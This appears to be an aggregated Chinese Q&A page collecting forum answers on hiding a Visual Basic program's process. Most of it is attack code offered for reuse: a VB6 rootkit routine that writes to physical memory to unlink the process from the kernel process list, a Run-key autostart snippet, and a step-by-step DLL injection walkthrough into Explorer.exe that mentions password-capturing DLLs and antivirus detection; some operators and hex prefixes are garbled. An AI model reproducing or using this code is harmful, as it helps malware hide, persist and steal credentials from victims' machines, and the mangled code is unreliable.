vb隐藏进程源码下载(vbs隐藏进程)
本文目录一览:
- 1、在VB中隐藏弹出窗口的进程?
- 2、在VB中有隐藏进程的代码吗?要最新的。
- 3、请问 VB中如何实现进程隐藏? 最好有代码示例
- 4、用VB实现隐藏进程
- 5、VB如何能在SP3下隐藏进程的源代码
- 6、VB隐藏进程的代码是什么?
在VB中隐藏弹出窗口的进程?
在模块中加入以下代码,在需要隐藏进程的窗体的load或Initialize事件中调用HideCurrentProcess即可。
Option Explicit
Private Const STATUS_INFO_LENGTH_MISMATCH = HC0000004
Private Const STATUS_ACCESS_DENIED = HC0000022
Private Const STATUS_INVALID_HandLE = HC0000008
Private Const ERROR_SUCCESS = 0
Private Const SECTION_MAP_WRITE = H2
Private Const SECTION_MAP_READ = H4
Private Const READ_CONTROL = H20000
Private Const WRITE_DAC = H40000
Private Const NO_INHERITANCE = 0
Private Const DACL_SECURITY_INFORMATION = H4
Private Type IO_STATUS_BLOCK
Status As Long
Information As Long
End Type
Private Type UNICODE_STRING
Length As Integer
MaximumLength As Integer
Buffer As Long
End Type
Private Const OBJ_INHERIT = H2
Private Const OBJ_PERMANENT = H10
Private Const OBJ_EXCLUSIVE = H20
Private Const OBJ_CASE_INSENSITIVE = H40
Private Const OBJ_OPENIF = H80
Private Const OBJ_OPENLINK = H100
Private Const OBJ_KERNEL_HandLE = H200
Private Const OBJ_VALID_ATTRIBUTES = H3F2
Private Type OBJECT_ATTRIBUTES
Length As Long
RootDirectory As Long
ObjectName As Long
Attributes As Long
SecurityDeor As Long
SecurityQualityOfService As Long
End Type
Private Type ACL
AclRevision As Byte
Sbz1 As Byte
AclSize As Integer
AceCount As Integer
Sbz2 As Integer
End Type
Private Enum ACCESS_MODE
NOT_USED_ACCESS
GRANT_ACCESS
SET_ACCESS
DENY_ACCESS
REVOKE_ACCESS
SET_AUDIT_SUCCESS
SET_AUDIT_FAILURE
End Enum
Private Enum MULTIPLE_TRUSTEE_OPERATION
NO_MULTIPLE_TRUSTEE
TRUSTEE_IS_IMPERSONATE
End Enum
Private Enum TRUSTEE_FORM
TRUSTEE_IS_SID
TRUSTEE_IS_NAME
End Enum
Private Enum TRUSTEE_TYPE
TRUSTEE_IS_UNKNOWN
TRUSTEE_IS_USER
TRUSTEE_IS_GROUP
End Enum
Private Type TRUSTEE
pMultipleTrustee As Long
MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION
TrusteeForm As TRUSTEE_FORM
TrusteeType As TRUSTEE_TYPE
ptstrName As String
End Type
Private Type EXPLICIT_ACCESS
grfAccessPermissions As Long
grfAccessMode As ACCESS_MODE
grfInheritance As Long
TRUSTEE As TRUSTEE
End Type
Private Type AceArray
List() As EXPLICIT_ACCESS
End Type
Private Enum SE_OBJECT_TYPE
SE_UNKNOWN_OBJECT_TYPE = 0
SE_FILE_OBJECT
SE_SERVICE
SE_PRINTER
SE_REGISTRY_KEY
SE_LMSHARE
SE_KERNEL_OBJECT
SE_WINDOW_OBJECT
SE_DS_OBJECT
SE_DS_OBJECT_ALL
SE_PROVIDER_DEFINED_OBJECT
SE_WMIGUID_OBJECT
End Enum
Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long,
ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As
Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long
Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long,
ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As
Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDeor As Long) As
Long
Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias
"SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries
As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As Long
Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias
"BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal
pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As
ACCESS_MODE, ByVal Inheritance As Long)
Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As
UNICODE_STRING, ByVal SourceString As Long)
Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long,
ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long
Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As
Long
Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As
Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal
dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long
Private Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As
Long
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination
As Any, Source As Any, ByVal Length As Long)
Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA"
(LpVersionInformation As OSVERSIONINFO) As Long
Private Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type
Private verinfo As OSVERSIONINFO
Private g_hNtDLL As Long
Private g_pMapPhysicalMemory As Long
Private g_hMPM As Long
Private aByte(3) As Byte
Public Sub HideCurrentProcess()
'在进程列表中隐藏当前应用程序进程
Dim thread As Long, process As Long, fw As Long, bw As Long
Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long
verinfo.dwOSVersionInfoSize = Len(verinfo)
If (GetVersionEx(verinfo)) 0 Then
If verinfo.dwPlatformId = 2 Then
If verinfo.dwMajorVersion = 5 Then
select Case verinfo.dwMinorVersion
Case 0
lOffsetFlink = HA0
lOffsetBlink = HA4
lOffsetPID = H9C
Case 1
lOffsetFlink = H88
lOffsetBlink = H8C
lOffsetPID = H84
End select
End If
End If
End If
If OpenPhysicalMemory 0 Then
thread = GetData(HFFDFF124)
process = GetData(thread + H44)
fw = GetData(process + lOffsetFlink)
bw = GetData(process + lOffsetBlink)
SetData fw + 4, bw
SetData bw, fw
CloseHandle g_hMPM
End If
End Sub
Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)
Dim pDacl As Long
Dim pNewDacl As Long
Dim pSD As Long
Dim dwRes As Long
Dim ea As EXPLICIT_ACCESS
GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0,
pDacl, 0, pSD
ea.grfAccessPermissions = SECTION_MAP_WRITE
ea.grfAccessMode = GRANT_ACCESS
ea.grfInheritance = NO_INHERITANCE
ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME
ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER
ea.TRUSTEE.ptstrName = "CURRENT_USER" vbNullChar
SetEntriesInAcl 1, ea, pDacl, pNewDacl
SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0,
ByVal pNewDacl, 0
CleanUp:
LocalFree pSD
LocalFree pNewDacl
End Sub
Private Function OpenPhysicalMemory() As Long
Dim Status As Long
Dim PhysmemString As UNICODE_STRING
Dim Attributes As OBJECT_ATTRIBUTES
RtlInitUnicodeString PhysmemString, StrPtr("\Device\PhysicalMemory")
Attributes.Length = Len(Attributes)
Attributes.RootDirectory = 0
Attributes.ObjectName = VarPtr(PhysmemString)
Attributes.Attributes = 0
Attributes.SecurityDeor = 0
Attributes.SecurityQualityOfService = 0
Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE,
Attributes)
If Status = STATUS_ACCESS_DENIED Then
Status = ZwOpenSection(g_hMPM, READ_CONTROL Or WRITE_DAC, Attributes)
SetPhyscialMemorySectionCanBeWrited g_hMPM
CloseHandle g_hMPM
Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE,
Attributes)
End If
Dim lDirectoty As Long
verinfo.dwOSVersionInfoSize = Len(verinfo)
If (GetVersionEx(verinfo)) 0 Then
If verinfo.dwPlatformId = 2 Then
If verinfo.dwMajorVersion = 5 Then
select Case verinfo.dwMinorVersion
Case 0
lDirectoty = H30000
Case 1
lDirectoty = H39000
End select
End If
End If
End If
If Status = 0 Then
g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, 4, 0, lDirectoty, H1000)
If g_pMapPhysicalMemory 0 Then OpenPhysicalMemory = g_hMPM
End If
End Function
Private Function LinearToPhys(BaseAddress As Long, addr As Long) As Long
Dim VAddr As Long, PGDE As Long, PTE As Long, PAddr As Long
Dim lTemp As Long
VAddr = addr
CopyMemory aByte(0), VAddr, 4
lTemp = Fix(ByteArrToLong(aByte) / (2 ^ 22))
PGDE = BaseAddress + lTemp * 4
CopyMemory PGDE, ByVal PGDE, 4
If (PGDE and 1) 0 Then
lTemp = PGDE and H80
If lTemp 0 Then
PAddr = (PGDE and HFFC00000) + (VAddr and H3FFFFF)
Else
PGDE = MapViewOfFile(g_hMPM, 4, 0, PGDE and HFFFFF000, H1000)
lTemp = (VAddr and H3FF000) / (2 ^ 12)
PTE = PGDE + lTemp * 4
CopyMemory PTE, ByVal PTE, 4
If (PTE and 1) 0 Then
PAddr = (PTE and HFFFFF000) + (VAddr and HFFF)
UnmapViewOfFile PGDE
End If
End If
End If
LinearToPhys = PAddr
End Function
Private Function GetData(addr As Long) As Long
Dim phys As Long, tmp As Long, ret As Long
phys = LinearToPhys(g_pMapPhysicalMemory, addr)
tmp = MapViewOfFile(g_hMPM, 4, 0, phys and HFFFFF000, H1000)
If tmp 0 Then
ret = tmp + ((phys and HFFF) / (2 ^ 2)) * 4
CopyMemory ret, ByVal ret, 4
UnmapViewOfFile tmp
GetData = ret
End If
End Function
Private Function SetData(ByVal addr As Long, ByVal data As Long) As Boolean
Dim phys As Long, tmp As Long, x As Long
phys = LinearToPhys(g_pMapPhysicalMemory, addr)
tmp = MapViewOfFile(g_hMPM, SECTION_MAP_WRITE, 0, phys and HFFFFF000, H1000)
If tmp 0 Then
x = tmp + ((phys and HFFF) / (2 ^ 2)) * 4
CopyMemory ByVal x, data, 4
UnmapViewOfFile tmp
SetData = True
End If
End Function
Private Function ByteArrToLong(inByte() As Byte) As Double
Dim I As Integer
For I = 0 To 3
ByteArrToLong = ByteArrToLong + inByte(I) * (H100 ^ I)
Next I
End Function
在VB中有隐藏进程的代码吗?要最新的。
在进程中隐藏的
Public Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Public Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long
Public Const RSP_SIMPLE_SERVICE = 1
Public Const RSP_UNREGISTER_SERVICE = 0
下面代码为隐藏
Public Sub MakeMeService()
Dim pid As Long
Dim reserv As Long
pid = GetCurrentProcessId() '取的当前运行的程序Id
regserv = RegisterServiceProcess(pid, RSP_SIMPLE_SERVICE)
对当前的程序传入 RSP_SIMPLE_SERVICE 消息,使此程序
从任务列表中隐藏
End Sub
'恢复隐藏
Public Sub UnMakeMeService()
Dim pid As Long
Dim reserv As Long
pid = GetCurrentProcessId()
regserv = RegisterServiceProcess(pid, RSP_UNREGISTER_SERVICE)
原理同上
End Sub
Private Sub Command1_Click()
Call MakeMeService
End Sub
Private Sub Command2_Click()
Call UnMakeMeService
End Sub
Private Sub Form_Load()
Form1.Left = Screen.Width / 2 - Form1.Width / 2
Form1.Top = Screen.Height / 2 - Form1.Height / 2
End Sub
开机自动启动
'使用下面这三个API与两个常数(标记部份为快捷键方式增加到开始下的启动)
Private Declare Function RegSetValue Lib "advapi32.dll" Alias "RegSetValueA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Const HKEY_LOCAL_MACHINE = H80000002
Const REG_SZ = 1
Private Sub Command1_Click()
Dim Ret2 As Long
'打开 HKEY_LOCAL_MACHINE 下的 software\microsoft\windows\currentVersion\run
RegCreateKey HKEY_LOCAL_MACHINE, "software\microsoft\windows\currentVersion\run", Ret2
'将此主键下的 "默认" 值改为你的 exe 全路径"
RegSetValue Ret2, vbNullString, REG_SZ, "c:\windows\abc.exe", 4
'关闭对主键的操作
RegCloseKey Ret2
End Sub
窗口总是在最前面
Option Explicit
'
' Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Private Declare Function SetWindowPos Lib "user32" ( _
ByVal hwnd As Long, _
ByVal hWndInsertAfter As Long, _
ByVal x As Long, ByVal y As Long, _
ByVal cx As Long, ByVal cy As Long, _
ByVal wFlags As Long _
) As Long
Const HWND_TOPMOST = -1
Const SWP_SHOWWINDOW = H40
Private Sub Form_load()
Dim retValue As Long
'将窗体设置为处于所有窗口的顶层,注意在 VB 中运行时,
’可能不行,但编译成EXE后就可以了
retValue = SetWindowPos(Me.hwnd, HWND_TOPMOST, Me.CurrentX,
Me.CurrentY, 300, 300, SWP_SHOWWINDOW)
End Sub
请问 VB中如何实现进程隐藏? 最好有代码示例
'隐藏进程在9X和2K中是不大一样的, 例如说你想隐藏一个进程
'在9X里面一个API就可以了, 可是2K以上系统就不行了
'2K里面隐藏进程一般都是系统服务, 所以不会显示
'大家多利用这个特性来弄, 也许有写VXD的
'不过VB里面想实现一般是写成服务了
'写服务比较普遍, 那么你取得服务就可以了
'给出一个WINDOWS服务管理器的部分代码。
'该代码在WINXP,VB6+SP6,WMI1.2(XP自带)测试通过。
'测试代码前请添加对MS WMI 1.X的引用,
'添加一个LISTVIEW(MS CMD CON 6.0里面的),
'名称默认,一个TEXTBOX,名称为TxtDescription 具体代码如下:
Option Explicit
Dim objSWbemLocator As SWbemLocator
Dim objSWbemServices As SWbemServices
Dim objSWbemObjectSet As SWbemObjectSet
Dim objSWbemObject As SWbemObject
Dim strComputer As String, strNameSpace As String, strClass As String
Private Sub Form_Load()
ListView1.ColumnHeaders.Clear
ListView1.ColumnHeaders.Add , , "名称", 2600
ListView1.ColumnHeaders.Add , , "状态", 1000
ListView1.ColumnHeaders.Add , , "启动类型", 1000
ListView1.ColumnHeaders.Add , , "路径", 2600
ListView1.ColumnHeaders.Add , , "登录身份", 1400
ListView1.ColumnHeaders.Add , , "进程ID", 900
ListView1.ColumnHeaders.Add , , "服务类型", 1400
ListView1.View = lvwReport
ListView1.FullRowSelect = True
strComputer = "." '计算机名,.为本机
strNameSpace = "root\cimv2" '指定命名空间为root\cimv2
strClass = "Win32_Service" '指定类为Win32_Service Set objSWbemLocator = CreateObject("WbemScripting.SWbemLocator") ’建立1个WBEM对象的引用指针 Set objSWbemServices = objSWbemLocator.ConnectServer(strComputer, strNameSpace) ’连接到指定计算机、命名空间的WMI,返回一个对 SWbemServices 对象的引用 RefreshList ’刷新服务列表
End Sub
'刷新服务列表
Sub RefreshList()
Dim i As Long
ListView1.ListItems.Clear
Set objSWbemObjectSet = objSWbemServices.ExecQuery("SELECT * FROM " strClass) '通过WQL查询,返回指定类的所有
For Each objSWbemObject In objSWbemObjectSet
ListView1.ListItems.Add , "a" i, objSWbemObject.DisplayName '将服务名称添加到ListView1第一列
ListView1.ListItems("a" i).SubItems(1) = objSWbemObject.State '将服务的状态添加到ListView1第二列
ListView1.ListItems("a" i).SubItems(2) = objSWbemObject.StartMode '将服务的启动方式添加到ListView1第三列 ListView1.ListItems("a" i).SubItems(3) = objSWbemObject.PathName ’将服务程序的路径添加到ListView1第四列 ListView1.ListItems("a" i).SubItems(4) = objSWbemObject.StartName ’将服务的登录身份添加到ListView1第五列 ListView1.ListItems("a" i).SubItems(5) = objSWbemObject.ProcessId ’将服务的进程ID添加到ListView1第六列,这里就是你所需要的隐藏的进程的PID了
ListView1.ListItems("a" i).SubItems(6) = objSWbemObject.ServiceType '将服务类型添加到ListView1第7列
If IsNull(objSWbemObject.Description) Then '添加说明
ListView1.ListItems("a" i).Tag = "无"
Else
ListView1.ListItems("a" i).Tag = objSWbemObject.Description
End If
i = i + 1
Next
Set ListView1.SelectedItem = ListView1.ListItems(1)
End Sub
Private Sub ListView1_ItemClick(ByVal Item As MSComctlLib.ListItem)
If Item.SubItems(1) = "Stopped" Then
Command1.Enabled = False
Command2.Enabled = True
Else
Command1.Enabled = True
Command2.Enabled = False
End If
Set objSWbemObjectSet = objSWbemServices.ExecQuery("SELECT * FROM " strClass " WHERE DisplayName = ’" ListView1.SelectedItem.Text "’") '查询类中DisplayName属性等于指定值的实例 ’
For Each objSWbemObject In objSWbemObjectSet
If IsNull(objSWbemObject.Description) Then
TxtDescription.Text = "无"
Else
TxtDescription.Text = objSWbemObject.Description
End If
Next
'将说明显示出来
TxtDescription.Text = ListView1.ListItems("a" ListView1.SelectedItem.Index - 1).Tag
End Sub
用VB实现隐藏进程
晕vb隐藏进程源码下载,二楼的代码怎么那么熟悉?似乎vb隐藏进程源码下载我去年发的。。
隐藏进程现在常用的是进程插入技术,找一个进程:如Explorer.exe,将自身隐藏在这个进程之内
不过这样的代码还是会被杀毒软件发现,代码就用现成的了:
第一步,提升本进程的系统权限。
因为我们要操作的是系统中的其他进程,没有足够的系统权限是无法读取甚至写入其他进程的内存地址的。提升进程权限可能用到以下的函数:
1.函数OpenProcessToken(
HANDLE ProcessHandle, // 进程的句柄
DWORD DesiredAccess, // 对进程的访问描述
PHANDLE TokenHandle // 打开进程令牌的句柄指针
);
这个函数的作用是打开进程令牌。
2.函数LookupPrivilegeValue(
LPCTSTR lpSystemName, //系统名称
LPCTSTR lpName, // 特权名称
PLUID lpLuid // 本地系统唯一的ID号
);
这个函数将会返回一个本地系统内独一无二的ID,来用于系统权限的更改,它的第1个参数是系统名,nil表示本系统。第2个参数是特权的名字。第3个参数用来接收函数返回的ID。
3.函数AdjustTokenPrivileges(
HANDLE TokenHandle, //更改权限的令牌环句柄
BOOL DisableAllPrivileges, //是否修改所有权限的标志位
PTOKEN_PRIVILEGES NewState, //新的系统权限信息
DWORD BufferLength, //上一个参数的长度
PTOKEN_PRIVILEGES PreviousState, // 返回更改系统特权以前的权限
PDWORD ReturnLength //上一个参数的长度
);
这个函数用于更改进程的系统权限 ,第1个参数是要更改权限的令牌环句柄。第2个参数如果为true表示更改所有的系统权限 ,false表示更改部分。第3个参数是要更改的系统特权的值。第4个参数是第3个参数的大小。第5个参数返回更改系统特权以前的权限,我们不需要就设为nil。第6个参数是第5个参数的大小。
把上面的东西合并起来写成一个函数,我们在其他代码中间直接调用PromoteDebugPrivilege就可以提升本进程的系统权限了。代码如下:
======================================================================
function PromoteDebugPrivilege(const PromoteEnabled: Boolean): Boolean;
var
hToken: THandle;
TokenPriv: TOKEN_PRIVILEGES;
Length: DWORD;
begin
Result := False;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken)) then
begin
TokenPriv.PrivilegeCount := 1;
LookupPrivilegeValue(nil, 'SeDebugPrivilege', TokenPriv.Privileges[0].Luid);
if PromoteEnabled then
TokenPriv.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
else
TokenPriv.Privileges[0].Attributes := 0;
Length := 0;
AdjustTokenPrivileges(hToken, False, TokenPriv, SizeOf(TokenPriv), nil, Length);
Result := GetLastError = ERROR_SUCCESS;
CloseHandle(hToken);
end;
end;
第二步,进入宿主的内存空间
在拥有了进入宿主程序内存的权限之后,我们所要做的是在其内存空间加入一些新的程序代码,或者是让其载入一个Dll文件里面的函数并运行起来。加入新的代码可以省掉一个dll文件,而加载dll文件可以安装一些系统级的钩子,如果我们的隐形程序是一个截获密码的程序,加载dll就是一个很好的选择。
Kernel32.dll中的函数LoadLibraryW可以加载dll,它只需要dll文件的文件路径就可以完成操作,我们可以很容易的在程序代码中实现取出一个文件路径的操作。但是,我们希望在宿主程序中加载,而我们取出的dll文件路径并不存在于宿主程序的内存空间里面,所以我们需要把dll的文件路径写入宿主的内存空间。这些操作可能用到以下的函数:
1.函数OpenProcess(
DWORD dwDesiredAccess, //访问标志
BOOL bInheritHandle, //继承句柄标志
DWORD dwProcessId // 进程Id
);
这个函数用于修改我们宿主进程的一些属性,这些属性放在第一个参数里面,比如PROCESS_VM_OPERATION就是允许远程VM操作,即允许VirtualProtectEx和WriteProcessMemory函数操作本进程内存空间。PROCESS_CREATE_THREAD 就是允许远程创建线程。PROCESS_VM_WRITE就是允许远程VM写,即允许 WriteProcessMemory函数访问本进程的内存空间。第二个参数是一个标志参数,用来确定返回的句柄是否可以被新的进程继承。我们的程序中设为False。第三个参数需要操作的进程Id,也就是我们的宿主进程的Id。
2.函数VirtualAllocEx(
HANDLE hProcess, //要进行操作的进程句柄,当然是我们的宿主了
LPVOID lpAddress, //分配空间的起始地址
DWORD dwSize, //分配空间的大小
DWORD flAllocationType, // 分配空间的类型
DWORD flProtect // 访问保护类型
);
我们使用 VirtualAllocEx函数在宿主进程中开辟一块内存空间,用于存放dll的文件名。VirtualAllocEx的第1个参数是要操作的进程,第2个是起始地址,第3个是长度,第4,5个是操作参数。其中MEM_COMMIT表示本函数分配的是物理内存或者是内存的页面文件,PAGE_READWRITE表示分配的区域内允许读写。
3.函数WriteProcessMemory (
HANDLE hProcess, //所要操作进程的句柄
LPVOID lpBaseAddress, //开始进行些操作的起始地址
LPVOID lpBuffer, //要写入数据的缓冲区指针
DWORD nSize, // 要写的bytes数
LPDWORD lpNumberOfBytesWritten // 实际写入的bytes数
);
前面在宿主内存中创建好空间后,现在往里面写入dll的名称,而我们的WriteProcessMemory函数就可以胜任这一项工作。WriteProcessMemory函数的第一个参数 是需要往其内存里面写入dd的进程句柄,第二个参数是 “要进行写操作”的目标内存起始地址,第三个参数是 “需要被写入的数据”的地址,第四个参数是准备要写入的长度,第五个参数是实际操作中写的长度,这个参数是被函数输出的。到这里我们就已经能成功把dll的路径名称写进了宿主的内存空间。
第三步,在宿主中启动新的线程vb隐藏进程源码下载!
刚才我们已经在宿主程序中创建了一个用于存放一个dll文件路径的缓冲区,现在我们就要让这个dll在宿主的内存空间中运行起来。我们是用LoadLibraryW函数来加载的,而使用LoadLibraryW,又需要知道LoadLibraryW函数的入口地址。所以在加载dll之前,我们要用GetProcAddress来得到LoadLibraryW的入口地址。我们来看看这几个函数的使用方法:
1.GetProcAddress(
HMODULE hModule, //dll模块的句柄
LPCSTR lpProcName // 函数名称
);
我们用这个函数主要想得到kernel32.dll中的函数LoadLibraryW的入口地址,所以
GetProcAddress(GetModuleHandle('Kernel32'), 'LoadLibraryW')就可以了,当然有些细节得符合程序编译器的要求,VC下使用就要改成
GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW")的形式。
2.CreateRemoteThread (
HANDLE hProcess, //要进行操作的进程句柄,也就是我们的宿主句柄
LPSECURITY_ATTRIBUTES lpThreadAttributes, //线程安全属性的指针
DWORD dwStackSize, //初始化堆(stack)的大小
LPTHREAD_START_ROUTINE lpStartAddress,//新建线程函数的指针,或叫做地址
LPVOID lpParameter, //新建线程函数的参数
DWORD dwCreationFlags, //标志位
LPDWORD lpThreadId //线程返回值
);
这个函数就是本文的点睛之笔了,我们之前所做所有的一切,都是在为它做准备工作,它的功能就是在其他任何进程中创建新的线程,让其他的程序或进程附加执行我们的代码。
VB如何能在SP3下隐藏进程的源代码
Option Explicit
Private Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) As Long
Private Declare Function GetWindowRect Lib "user32" (ByVal hwnd As Long, lpRect As RECT) As Long
Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal X As Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Private Type RECT
Left As Long
Top As Long
Right As Long
Bottom As Long
End Type
Private Type POINTAPI
X As Long
Y As Long
End Type
Private Const HWND_TOPMOST = -1
Private Const SWP_NOSIZE = H1
Private Const SWP_NOMOVE = H2
Private Const HWND_TOP = 0
Private Const SWP_NOACTIVATE = H10
Private Const SWP_SHOWWINDOW = H40
Private Sub Form_Load()
'注释: 窗体放在最前面
SetWindowPos Me.hwnd, HWND_TOPMOST, 0, 0, 0, 0, SWP_SHOWWINDOW Or SWP_NOMOVE Or SWP_NOSIZE
End Sub
Private Sub Timer1_Timer()
Dim p As POINTAPI
Dim f As RECT
GetCursorPos p '注释:得到MOUSE位置
GetWindowRect Me.hwnd, f '注释:得到窗体的位置
If Me.WindowState 1 Then
If p.X f.Left And p.X f.Right And p.Y f.Top And p.Y f.Bottom Then
'注释:MOUSE 在窗体上
If Me.Top 0 Then
Me.Top = -10
Me.Show
ElseIf Me.Left 0 Then
Me.Left = -10
Me.Show
ElseIf Me.Left + Me.Width = Screen.Width Then
Me.Left = Screen.Width - Me.Width + 10
Me.Show
End If
Else
If f.Top = 4 Then
Me.Top = 40 - Me.Height
ElseIf f.Left = 4 Then
Me.Left = 40 - Me.Width
ElseIf Me.Left + Me.Width = Screen.Width - 4 Then
Me.Left = Screen.Width - 40
End If
End If
End If
End Sub
VB隐藏进程的代码是什么?
没用
VB在98下可以隐藏自己,用RegisterServiceProcess这个API可是NT下(2000以后都是NT的,XP也是)没这个函数App.TaskVisible
=
False
这句只能让自己的窗口不出现在任务管理器的应用程序窗里面进程还是可以看到,基本没找到可以隐藏进程的,死心吧
